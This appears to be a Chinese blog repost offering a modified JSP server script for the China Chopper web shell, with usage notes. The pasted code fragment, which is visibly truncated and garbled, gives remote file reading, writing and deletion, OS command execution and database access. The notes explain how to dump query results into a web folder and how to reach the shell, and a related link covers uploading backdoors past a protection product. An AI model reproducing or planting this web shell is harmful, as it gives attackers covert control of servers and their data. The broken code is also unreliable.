某些朋友需求,这里简单的修改了下菜刀原作者的JSP脚本。主要是修复了一些BUG和代码优化,新增了查询自定义备份功能。
修复BUG:
1、初始化获取容器绝对路径错误如:原本路径是D:wooyun菜刀连接默认跳转到了:D:wooyunwooyun目录。
2、修改了无法连接Oracle数据库问题
3、修改了远程下载代码
4、重新压了下代码
新的客户端代码如下:
2){c.setCatalog(x[2].trim());}return c;}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+""+"|");String s = request.getSession().getServletContext().getRealPath("/");if(Z.equals("A")){sb.append(s+"t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"rn");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs, z1, z2,sb,s.replaceAll("\","/")+"/images/");}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"
执行自定义查询备份:
在任意的SQL语句后面加上:--f:xxxx.sql(任意文件名和后缀)
如:
SELECT * FROM DEPT ORDER BY 1 DESC --f:2.sql
程序会自动在网站根目录新建或打开images文件夹写入2.sql.
直接访问菜刀URL地址报错问题:
这是由于菜刀默认必须传入编码,如果编码为空那么会爆一个异常导致500错误页面。如果你硬是要看到不报错的页面你可以这样去访问:
http://127.0.0.1/wooyun/2.jsp?z0=utf-8
菜刀连接各种数据库问题:
菜刀其实是可以连接任意数据库的,但是有个前提,在当前应用或容器下必须有对应的数据库的jar包,否则无法连接。jar包位置在/WEB-INF/lib目录,没有对应的jar则无法连接。
连接任意数据库的URL大致格式(抄袭下面的格式无效,自行小修改即可)
//ORACLE private static final String ORACLEDRIVER = "oracle.jdbc.driver.OracleDriver"; private static final String ORACLEURL = "jdbc:oracle:thin:@[host]:[port]:[dbname]"; //MSSQL2000 private static final String MSSQL2000DRIVER = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; private static final String MSSQL2000URL = "jdbc:microsoft:sqlserver://[host]:[port];databasename=[dbname]"; //MSSQL2005 private static final String MSSQL2005DRIVER = "com.microsoft.sqlserver.jdbc.SQLServerDriver"; private static final String MSSQL2005URL = "jdbc:sqlserver://[host]:[port];databaseName=[dbname]"; //MYSQL private static final String MYSQLDRIVER = "com.mysql.jdbc.Driver"; private static final String MYSQLURL = "jdbc:mysql://[host]:[port]/[dbname]"; //Db2 private static final String IBMDB2DRIVER = "com.ibm.db2.jcc.DB2Driver"; private static final String IBMDB2URL = "jdbc:db2://[host]:[port]/[dbname]"; //Informix private static final String INFORMIXDRIVER = "com.informix.jdbc.IfxDriver"; private static final String INFORMIXURL = "jdbc:informix-sqli://[host]:[port]/[dbname]"; //Sybase2 private static final String SYBASE2DRIVER = "com.sybase.jdbc2.jdbc.SybDriver"; private static final String SYBASE2URL = "jdbc:sybase:Tds:[host]:[port]?ServiceName=[dbname]"; //Sybase3 private static final String SYBASE3DRIVER = "com.sybase.jdbc3.jdbc.SybDriver"; private static final String SYBASE3URL = "jdbc:sybase:Tds:[host]:[port]?ServiceName=[dbname]"; //PostgreSQL private static final String POSTGRESQLDRIVER = "org.postgresql.Driver"; private static final String POSTGRESQLURL = "jdbc:postgresql://[host]:[port]/[dbname]"; //Teradata private static final String TERADARADRIVER = "com.ncr.teradata.TeraDriver"; private static final String TERADARAURL = "jdbc:teradata://[host]:[port]/[dbname]"; //Netezza private static final String NETEZZADRIVER = "org.netezza.Driver"; private static final String NETEZZADURL = " jdbc:netezza://[host]:[port]/[dbname]";
文章来源于lcx.cc:菜刀Jsp脚本增强版
相关推荐: Windows下使用特殊文件名绕过安全狗上传脚本后门[3.3 08722]
绕过安全狗上传[3.3 08722] 90_ | 2014-06-27 13:42 ########################################## # Title :绕过安全狗上传[3.3 08722] # Team :08 Securi…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论